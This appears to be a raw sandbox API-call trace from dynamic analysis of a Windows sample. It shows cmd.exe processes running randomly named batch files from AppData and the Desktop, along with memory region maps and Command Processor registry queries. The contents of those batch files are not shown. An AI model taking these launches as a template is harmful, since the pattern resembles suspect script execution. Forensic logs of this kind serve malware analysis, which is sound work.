SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.981] GetLastError () returned 0x0 [0299.981] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetLastError () returned 0x0 [0299.982] SetLastError (dwErrCode=0x0) [0299.982] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0300.151] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3a, lpOverlapped=0x0) returned 1 [0300.325] GetLastError () returned 0x0 [0300.325] SetLastError (dwErrCode=0x0) [0300.325] GetLastError () returned 0x0 [0300.325] SetLastError (dwErrCode=0x0) [0300.325] GetLastError () returned 0x0 [0300.325] SetLastError (dwErrCode=0x0) [0300.325] GetLastError () returned 0x0 [0300.325] SetLastError (dwErrCode=0x0) [0300.325] GetLastError () returned 0x0 [0300.325] SetLastError (dwErrCode=0x0) [0300.325] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.326] GetLastError () returned 0x0 [0300.326] SetLastError (dwErrCode=0x0) [0300.327] GetLastError () returned 0x0 [0300.327] SetLastError (dwErrCode=0x0) [0300.327] GetLastError () returned 0x0 [0300.327] GetLastError () returned 0x0 [0300.327] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0300.568] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x8a, lpOverlapped=0x0) returned 1 [0300.766] GetLastError () returned 0x0 [0300.766] GetLastError () returned 0x0 [0300.766] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0300.784] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x55, lpOverlapped=0x0) returned 1 [0300.944] GetLastError () returned 0x0 [0300.944] GetLastError () returned 0x0 [0300.944] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0300.989] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x3b, lpOverlapped=0x0) returned 1 [0301.077] GetLastError () returned 0x0 [0301.077] GetLastError () returned 0x0 [0301.077] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.107] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x38, lpOverlapped=0x0) returned 1 [0301.249] GetLastError () returned 0x0 [0301.249] GetLastError () returned 0x0 [0301.250] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.321] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x45, lpOverlapped=0x0) returned 1 [0301.384] GetLastError () returned 0x0 [0301.384] GetLastError () returned 0x0 [0301.385] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.434] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4a, lpOverlapped=0x0) returned 1 [0301.436] GetLastError () returned 0x0 [0301.436] GetLastError () returned 0x0 [0301.436] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.441] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x4e, lpOverlapped=0x0) returned 1 [0301.487] GetLastError () returned 0x0 [0301.488] GetLastError () returned 0x0 [0301.488] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.762] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x48, lpOverlapped=0x0) returned 1 [0301.809] GetLastError () returned 0x0 [0301.809] GetLastError () returned 0x0 [0301.809] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0301.823] WriteFile (hFile=0xc, lpBuffer=0x14e980, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0) Thread: id = 1010 os_tid = 0xccc Process: id = "152" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7c016000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "C:\\Windows\\SYSTEM32\\cmd.exe /c \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10462 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10463 start_va = 0x3dfe610000 end_va = 0x3dfe62ffff entry_point = 0x0 region_type = private name = "private_0x0000003dfe610000" filename = "" Region: id = 10464 start_va = 0x3dfe630000 end_va = 0x3dfe643fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003dfe630000" filename = "" Region: id = 10465 start_va = 0x3dfe650000 end_va = 0x3dfe74ffff entry_point = 0x0 region_type = private name = "private_0x0000003dfe650000" filename = "" Region: id = 10466 start_va = 0x3dfe750000 end_va = 0x3dfe753fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003dfe750000" filename = "" Region: id = 10467 start_va = 0x7df5ffd30000 end_va = 0x7ff5ffd2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd30000" filename = "" Region: id = 10468 start_va = 0x7ff677510000 end_va = 0x7ff677532fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff677510000" filename = "" Region: id = 10469 start_va = 0x7ff677537000 end_va = 0x7ff677537fff entry_point = 0x0 region_type = private name = "private_0x00007ff677537000" filename = "" Region: id = 10470 start_va = 0x7ff67753e000 end_va = 0x7ff67753ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67753e000" filename = "" Region: id = 10471 start_va = 0x7ff677ed0000 end_va = 0x7ff677f28fff entry_point = 0x7ff677ed0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10472 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10476 start_va = 0x3dfe760000 end_va = 0x3dfe760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003dfe760000" filename = "" Region: id = 10477 start_va = 0x3dfe770000 end_va = 0x3dfe771fff entry_point = 0x0 region_type = private name = "private_0x0000003dfe770000" filename = "" Process: id = "153" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x60bf6000" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10481 start_va = 0xd60000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 10482 start_va = 0xd80000 end_va = 0xd81fff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 10483 start_va = 0xd90000 end_va = 0xda3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 10484 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 10485 start_va = 0xdf0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 10486 start_va = 0xef0000 end_va = 0xef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 10487 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 10488 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 10489 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10490 start_va = 0x7ea80000 end_va = 0x7eaa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea80000" filename = "" Region: id = 10491 start_va = 0x7eaab000 end_va = 0x7eaadfff entry_point = 0x0 region_type = private name = "private_0x000000007eaab000" filename = "" Region: id = 10492 start_va = 0x7eaae000 end_va = 0x7eaaefff entry_point = 0x0 region_type = private name = "private_0x000000007eaae000" filename = "" Region: id = 10493 start_va = 0x7eaaf000 end_va = 0x7eaaffff entry_point = 0x0 region_type = private name = "private_0x000000007eaaf000" filename = "" Region: id = 10494 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10495 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10496 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10497 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10498 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10499 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 10500 start_va = 0xf10000 end_va = 0xf11fff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 10504 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 10505 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10506 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10507 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10508 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10509 start_va = 0xf30000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 10510 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10511 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10512 start_va = 0xd60000 end_va = 0xd6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 10513 start_va = 0x7e980000 end_va = 0x7ea7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e980000" filename = "" Region: id = 10661 start_va = 0xf30000 end_va = 0xfedfff entry_point = 0xf30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10662 start_va = 0x1030000 end_va = 0x112ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 10663 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10664 start_va = 0xff0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 10665 start_va = 0x1130000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 10666 start_va = 0x1230000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 10667 start_va = 0x7eaa8000 end_va = 0x7eaaafff entry_point = 0x0 region_type = private name = "private_0x000000007eaa8000" filename = "" Region: id = 10668 start_va = 0xd70000 end_va = 0xd73fff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 10848 start_va = 0xd80000 end_va = 0xd83fff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 10869 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 10870 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10871 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10872 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10873 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10874 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10875 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10876 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 10877 start_va = 0x1350000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 10916 start_va = 0x5420000 end_va = 0x5756fff entry_point = 0x5420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 1016 os_tid = 0xcf4 [0300.057] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0300.057] __set_app_type (_Type=0x1) [0300.057] __p__fmode () returned 0x77984d6c [0300.057] __p__commode () returned 0x77985b1c [0300.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0300.057] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0300.057] GetCurrentThreadId () returned 0xcf4 [0300.057] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf4) returned 0x84 [0300.057] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0300.057] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0300.057] SetThreadUILanguage (LangId=0x0) returned 0x409 [0300.222] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0300.222] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xeefeb8 | out: phkResult=0xeefeb8*=0x0) returned 0x2 [0300.223] VirtualQuery (in: lpAddress=0xeefebf, lpBuffer=0xeefe70, dwLength=0x1c | out: lpBuffer=0xeefe70*(BaseAddress=0xeef000, AllocationBase=0xdf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0300.223] VirtualQuery (in: lpAddress=0xdf0000, lpBuffer=0xeefe70, dwLength=0x1c | out: lpBuffer=0xeefe70*(BaseAddress=0xdf0000, AllocationBase=0xdf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0300.223] VirtualQuery (in: lpAddress=0xdf1000, lpBuffer=0xeefe70, dwLength=0x1c | out: lpBuffer=0xeefe70*(BaseAddress=0xdf1000, AllocationBase=0xdf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0300.223] VirtualQuery (in: lpAddress=0xdf3000, lpBuffer=0xeefe70, dwLength=0x1c | out: lpBuffer=0xeefe70*(BaseAddress=0xdf3000, AllocationBase=0xdf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0300.223] VirtualQuery (in: lpAddress=0xef0000, lpBuffer=0xeefe70, dwLength=0x1c | out: lpBuffer=0xeefe70*(BaseAddress=0xef0000, AllocationBase=0xef0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0300.223] GetConsoleOutputCP () returned 0x1b5 [0300.521] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0300.521] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0300.521] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.521] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0300.666] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.666] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0300.773] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.773] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0300.894] _get_osfhandle (_FileHandle=0) returned 0x38 [0300.894] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0300.984] _get_osfhandle (_FileHandle=0) returned 0x38 [0300.984] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0301.071] GetEnvironmentStringsW () returned 0x1037ea8* [0301.071] FreeEnvironmentStringsA (penv="A") returned 1 [0301.071] GetEnvironmentStringsW () returned 0x1037ea8* [0301.071] FreeEnvironmentStringsA (penv="A") returned 1 [0301.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xeeee1c | out: phkResult=0xeeee1c*=0x94) returned 0x0 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0xc8, lpcbData=0xeeee24*=0x1000) returned 0x2 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x1, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0x1, lpcbData=0xeeee24*=0x1000) returned 0x2 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x0, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x40, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x40, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.071] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0x40, lpcbData=0xeeee24*=0x1000) returned 0x2 [0301.071] RegCloseKey (hKey=0x94) returned 0x0 [0301.072] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xeeee1c | out: phkResult=0xeeee1c*=0x94) returned 0x0 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0x40, lpcbData=0xeeee24*=0x1000) returned 0x2 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x4, lpData=0xeeee28*=0x1, lpcbData=0xeeee24*=0x4) returned 0x0 [0301.072] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xeeee20, lpData=0xeeee28, lpcbData=0xeeee24*=0x1000 | out: lpType=0xeeee20*=0x0, lpData=0xeeee28*=0x1, lpcbData=0xeeee24*=0x1000) 